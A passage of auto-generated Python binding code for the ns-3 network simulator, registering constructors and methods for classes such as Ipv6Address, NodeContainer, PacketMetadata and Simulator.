cls.add_method('MakeAutoconfiguredLinkLocalAddress',
'ns3::Ipv6Address',
[param('ns3::Mac64Address', 'mac')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeIpv4MappedAddress(ns3::Ipv4Address addr) [member function]
cls.add_method('MakeIpv4MappedAddress',
'ns3::Ipv6Address',
[param('ns3::Ipv4Address', 'addr')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeSolicitedAddress(ns3::Ipv6Address addr) [member function]
cls.add_method('MakeSolicitedAddress',
'ns3::Ipv6Address',
[param('ns3::Ipv6Address', 'addr')],
is_static=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Serialize(uint8_t * buf) const [member function]
cls.add_method('Serialize',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(char const * address) [member function]
cls.add_method('Set',
'void',
[param('char const *', 'address')])
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(uint8_t * address) [member function]
cls.add_method('Set',
'void',
[param('uint8_t *', 'address')])
return
def register_Ns3Ipv6InterfaceAddress_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::Ipv6InterfaceAddress() [constructor]
cls.add_constructor([])
## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::Ipv6InterfaceAddress(ns3::Ipv6Address address) [constructor]
cls.add_constructor([param('ns3::Ipv6Address', 'address')])
## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::Ipv6InterfaceAddress(ns3::Ipv6Address address, ns3::Ipv6Prefix prefix) [constructor]
cls.add_constructor([param('ns3::Ipv6Address', 'address'), param('ns3::Ipv6Prefix', 'prefix')])
## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::Ipv6InterfaceAddress(ns3::Ipv6InterfaceAddress const & o) [copy constructor]
cls.add_constructor([param('ns3::Ipv6InterfaceAddress const &', 'o')])
## ipv6-interface-address.h (module 'internet'): ns3::Ipv6Address ns3::Ipv6InterfaceAddress::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::Ipv6Address',
[],
is_const=True)
## ipv6-interface-address.h (module 'internet'): uint32_t ns3::Ipv6InterfaceAddress::GetNsDadUid() const [member function]
cls.add_method('GetNsDadUid',
'uint32_t',
[],
is_const=True)
## ipv6-interface-address.h (module 'internet'): ns3::Ipv6Prefix ns3::Ipv6InterfaceAddress::GetPrefix() const [member function]
cls.add_method('GetPrefix',
'ns3::Ipv6Prefix',
[],
is_const=True)
## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::Scope_e ns3::Ipv6InterfaceAddress::GetScope() const [member function]
cls.add_method('GetScope',
'ns3::Ipv6InterfaceAddress::Scope_e',
[],
is_const=True)
## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::State_e ns3::Ipv6InterfaceAddress::GetState() const [member function]
cls.add_method('GetState',
'ns3::Ipv6InterfaceAddress::State_e',
[],
is_const=True)
## ipv6-interface-address.h (module 'internet'): void ns3::Ipv6InterfaceAddress::SetAddress(ns3::Ipv6Address address) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::Ipv6Address', 'address')])
## ipv6-interface-address.h (module 'internet'): void ns3::Ipv6InterfaceAddress::SetNsDadUid(uint32_t uid) [member function]
cls.add_method('SetNsDadUid',
'void',
[param('uint32_t', 'uid')])
## ipv6-interface-address.h (module 'internet'): void ns3::Ipv6InterfaceAddress::SetScope(ns3::Ipv6InterfaceAddress::Scope_e scope) [member function]
cls.add_method('SetScope',
'void',
[param('ns3::Ipv6InterfaceAddress::Scope_e', 'scope')])
## ipv6-interface-address.h (module 'internet'): void ns3::Ipv6InterfaceAddress::SetState(ns3::Ipv6InterfaceAddress::State_e state) [member function]
cls.add_method('SetState',
'void',
[param('ns3::Ipv6InterfaceAddress::State_e', 'state')])
return
def register_Ns3Ipv6Prefix_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t * prefix) [constructor]
cls.add_constructor([param('uint8_t *', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(char const * prefix) [constructor]
cls.add_constructor([param('char const *', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t prefix) [constructor]
cls.add_constructor([param('uint8_t', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const & prefix) [copy constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const &', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const * prefix) [constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const *', 'prefix')])
## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::GetBytes(uint8_t * buf) const [member function]
cls.add_method('GetBytes',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): uint8_t ns3::Ipv6Prefix::GetPrefixLength() const [member function]
cls.add_method('GetPrefixLength',
'uint8_t',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsEqual(ns3::Ipv6Prefix const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv6Prefix const &', 'other')],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsMatch(ns3::Ipv6Address a, ns3::Ipv6Address b) const [member function]
cls.add_method('IsMatch',
'bool',
[param('ns3::Ipv6Address', 'a'), param('ns3::Ipv6Address', 'b')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
return
def register_Ns3NodeContainer_methods(root_module, cls):
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'arg0')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer() [constructor]
cls.add_constructor([])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::Ptr<ns3::Node> node) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Node >', 'node')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(std::string nodeName) [constructor]
cls.add_constructor([param('std::string', 'nodeName')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d, ns3::NodeContainer const & e) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd'), param('ns3::NodeContainer const &', 'e')])
## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::NodeContainer other) [member function]
cls.add_method('Add',
'void',
[param('ns3::NodeContainer', 'other')])
## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## node-container.h (module 'network'): void ns3::NodeContainer::Add(std::string nodeName) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'nodeName')])
## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::Begin() const [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
[],
is_const=True)
## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n) [member function]
cls.add_method('Create',
'void',
[param('uint32_t', 'n')])
## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n, uint32_t systemId) [member function]
cls.add_method('Create',
'void',
[param('uint32_t', 'n'), param('uint32_t', 'systemId')])
## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::End() const [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
[],
is_const=True)
## node-container.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NodeContainer::Get(uint32_t i) const [member function]
cls.add_method('Get',
'ns3::Ptr< ns3::Node >',
[param('uint32_t', 'i')],
is_const=True)
## node-container.h (module 'network'): static ns3::NodeContainer ns3::NodeContainer::GetGlobal() [member function]
cls.add_method('GetGlobal',
'ns3::NodeContainer',
[],
is_static=True)
## node-container.h (module 'network'): uint32_t ns3::NodeContainer::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
return
def register_Ns3ObjectBase_methods(root_module, cls):
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
cls.add_constructor([])
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
cls.add_method('GetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
is_const=True)
## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
cls.add_method('GetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
is_const=True)
## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
cls.add_method('ConstructSelf',
'void',
[param('ns3::AttributeConstructionList const &', 'attributes')],
visibility='protected')
## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
cls.add_method('NotifyConstructionCompleted',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectDeleter_methods(root_module, cls):
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter() [constructor]
cls.add_constructor([])
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter(ns3::ObjectDeleter const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')])
## object.h (module 'core'): static void ns3::ObjectDeleter::Delete(ns3::Object * object) [member function]
cls.add_method('Delete',
'void',
[param('ns3::Object *', 'object')],
is_static=True)
return
def register_Ns3ObjectFactory_methods(root_module, cls):
cls.add_output_stream_operator()
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(ns3::ObjectFactory const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactory const &', 'arg0')])
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(std::string typeId) [constructor]
cls.add_constructor([param('std::string', 'typeId')])
## object-factory.h (module 'core'): ns3::Ptr<ns3::Object> ns3::ObjectFactory::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::Object >',
[],
is_const=True)
## object-factory.h (module 'core'): ns3::TypeId ns3::ObjectFactory::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
## object-factory.h (module 'core'): void ns3::ObjectFactory::Set(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('Set',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(ns3::TypeId tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('ns3::TypeId', 'tid')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(char const * tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('char const *', 'tid')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(std::string tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('std::string', 'tid')])
return
def register_Ns3PacketMetadata_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(uint64_t uid, uint32_t size) [constructor]
cls.add_constructor([param('uint64_t', 'uid'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(ns3::PacketMetadata const & o) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata const &', 'o')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddAtEnd(ns3::PacketMetadata const & o) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::PacketMetadata const &', 'o')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddHeader(ns3::Header const & header, uint32_t size) [member function]
cls.add_method('AddHeader',
'void',
[param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddPaddingAtEnd(uint32_t end) [member function]
cls.add_method('AddPaddingAtEnd',
'void',
[param('uint32_t', 'end')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddTrailer(ns3::Trailer const & trailer, uint32_t size) [member function]
cls.add_method('AddTrailer',
'void',
[param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::PacketMetadata::BeginItem(ns3::Buffer buffer) const [member function]
cls.add_method('BeginItem',
'ns3::PacketMetadata::ItemIterator',
[param('ns3::Buffer', 'buffer')],
is_const=True)
## packet-metadata.h (module 'network'): ns3::PacketMetadata ns3::PacketMetadata::CreateFragment(uint32_t start, uint32_t end) const [member function]
cls.add_method('CreateFragment',
'ns3::PacketMetadata',
[param('uint32_t', 'start'), param('uint32_t', 'end')],
is_const=True)
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Deserialize(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::Enable() [member function]
cls.add_method('Enable',
'void',
[],
is_static=True)
## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::EnableChecking() [member function]
cls.add_method('EnableChecking',
'void',
[],
is_static=True)
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packet-metadata.h (module 'network'): uint64_t ns3::PacketMetadata::GetUid() const [member function]
cls.add_method('GetUid',
'uint64_t',
[],
is_const=True)
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtEnd(uint32_t end) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'end')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtStart(uint32_t start) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'start')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveHeader(ns3::Header const & header, uint32_t size) [member function]
cls.add_method('RemoveHeader',
'void',
[param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveTrailer(ns3::Trailer const & trailer, uint32_t size) [member function]
cls.add_method('RemoveTrailer',
'void',
[param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3PacketMetadataItem_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item() [constructor]
cls.add_constructor([])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item(ns3::PacketMetadata::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata::Item const &', 'arg0')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::current [variable]
cls.add_instance_attribute('current', 'ns3::Buffer::Iterator', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentSize [variable]
cls.add_instance_attribute('currentSize', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromEnd [variable]
cls.add_instance_attribute('currentTrimedFromEnd', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromStart [variable]
cls.add_instance_attribute('currentTrimedFromStart', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::isFragment [variable]
cls.add_instance_attribute('isFragment', 'bool', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3PacketMetadataItemIterator_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata::ItemIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata::ItemIterator const &', 'arg0')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata const * metadata, ns3::Buffer buffer) [constructor]
cls.add_constructor([param('ns3::PacketMetadata const *', 'metadata'), param('ns3::Buffer', 'buffer')])
## packet-metadata.h (module 'network'): bool ns3::PacketMetadata::ItemIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item ns3::PacketMetadata::ItemIterator::Next() [member function]
cls.add_method('Next',
'ns3::PacketMetadata::Item',
[])
return
def register_Ns3PacketTagIterator_methods(root_module, cls):
## packet.h (module 'network'): ns3::PacketTagIterator::PacketTagIterator(ns3::PacketTagIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagIterator const &', 'arg0')])
## packet.h (module 'network'): bool ns3::PacketTagIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet.h (module 'network'): ns3::PacketTagIterator::Item ns3::PacketTagIterator::Next() [member function]
cls.add_method('Next',
'ns3::PacketTagIterator::Item',
[])
return
def register_Ns3PacketTagIteratorItem_methods(root_module, cls):
## packet.h (module 'network'): ns3::PacketTagIterator::Item::Item(ns3::PacketTagIterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagIterator::Item const &', 'arg0')])
## packet.h (module 'network'): void ns3::PacketTagIterator::Item::GetTag(ns3::Tag & tag) const [member function]
cls.add_method('GetTag',
'void',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::TypeId ns3::PacketTagIterator::Item::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
return
def register_Ns3PacketTagList_methods(root_module, cls):
## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList() [constructor]
cls.add_constructor([])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList(ns3::PacketTagList const & o) [copy constructor]
cls.add_constructor([param('ns3::PacketTagList const &', 'o')])
## packet-tag-list.h (module 'network'): void ns3::PacketTagList::Add(ns3::Tag const & tag) const [member function]
cls.add_method('Add',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData const * ns3::PacketTagList::Head() const [member function]
cls.add_method('Head',
'ns3::PacketTagList::TagData const *',
[],
is_const=True)
## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Peek(ns3::Tag & tag) const [member function]
cls.add_method('Peek',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Remove(ns3::Tag & tag) [member function]
cls.add_method('Remove',
'bool',
[param('ns3::Tag &', 'tag')])
## packet-tag-list.h (module 'network'): void ns3::PacketTagList::RemoveAll() [member function]
cls.add_method('RemoveAll',
'void',
[])
## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Replace(ns3::Tag & tag) [member function]
cls.add_method('Replace',
'bool',
[param('ns3::Tag &', 'tag')])
return
def register_Ns3PacketTagListTagData_methods(root_module, cls):
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData() [constructor]
cls.add_constructor([])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData(ns3::PacketTagList::TagData const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagList::TagData const &', 'arg0')])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::count [variable]
cls.add_instance_attribute('count', 'uint32_t', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::data [variable]
cls.add_instance_attribute('data', 'uint8_t [ 20 ]', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::next [variable]
cls.add_instance_attribute('next', 'ns3::PacketTagList::TagData *', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount(ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3Simulator_methods(root_module, cls):
## simulator.h (module 'core'): ns3::Simulator::Simulator(ns3::Simulator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Simulator const &', 'arg0')])
## simulator.h (module 'core'): static void ns3::Simulator::Cancel(ns3::EventId const & id) [member function]
cls.add_method('Cancel',
'void',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Destroy() [member function]
cls.add_method('Destroy',
'void',
[],
is_static=True)
## simulator.h (module 'core'): static uint32_t ns3::Simulator::GetContext() [member function]
cls.add_method('GetContext',
'uint32_t',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetDelayLeft(ns3::EventId const & id) [member function]
cls.add_method('GetDelayLeft',
'ns3::Time',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static ns3::Ptr<ns3::SimulatorImpl> ns3::Simulator::GetImplementation() [member function]
cls.add_method('GetImplementation',
'ns3::Ptr< ns3::SimulatorImpl >',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetMaximumSimulationTime() [member function]
cls.add_method('GetMaximumSimulationTime',
'ns3::Time',
[],
is_static=True)
## simulator.h (module 'core'): static uint32_t ns3::Simulator::GetSystemId() [member function]
cls.add_method('GetSystemId',
'uint32_t',
[],
is_static=True)
## simulator.h (module 'core'): static bool ns3::Simulator::IsExpired(ns3::EventId const & id) [member function]
cls.add_method('IsExpired',
'bool',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static bool ns3::Simulator::IsFinished() [member function]
cls.add_method('IsFinished',
'bool',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::Now() [member function]
cls.add_method('Now',
'ns3::Time',
[],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Remove(ns3::EventId const & id) [member function]
cls.add_method('Remove',
'void',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::SetImplementation(ns3::Ptr<ns3::SimulatorImpl> impl) [member function]
cls.add_method('SetImplementation',
'void',
[param('ns3::Ptr< ns3::SimulatorImpl >', 'impl')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::SetScheduler(ns3::ObjectFactory schedulerFactory) [member function]
cls.add_method('SetScheduler',
'void',
[param('ns3::ObjectFactory', 'schedulerFactory')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Stop() [member function]
cls.add_method('Stop',
'void',
[],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Stop(ns3::Time const & time) [member function]
cls.add_method('Stop',
'void',
[param('ns3::Time const &', 'time')],
is_static=True)
return
def register_Ns3Tag_methods(root_module, cls):
## tag.h (module 'network'): ns3::Tag::Tag() [constructor]
cls.add_constructor([])
## tag.h (module 'network'): ns3::Tag::Tag(ns3::Tag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Tag const &', 'arg0')])
## tag.h (module 'network'): void ns3::Tag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_pure_virtual=True, is_virtual=True)
## tag.h (module 'network'): uint32_t ns3::Tag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## tag.h (module 'network'): static ns3::TypeId ns3::Tag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
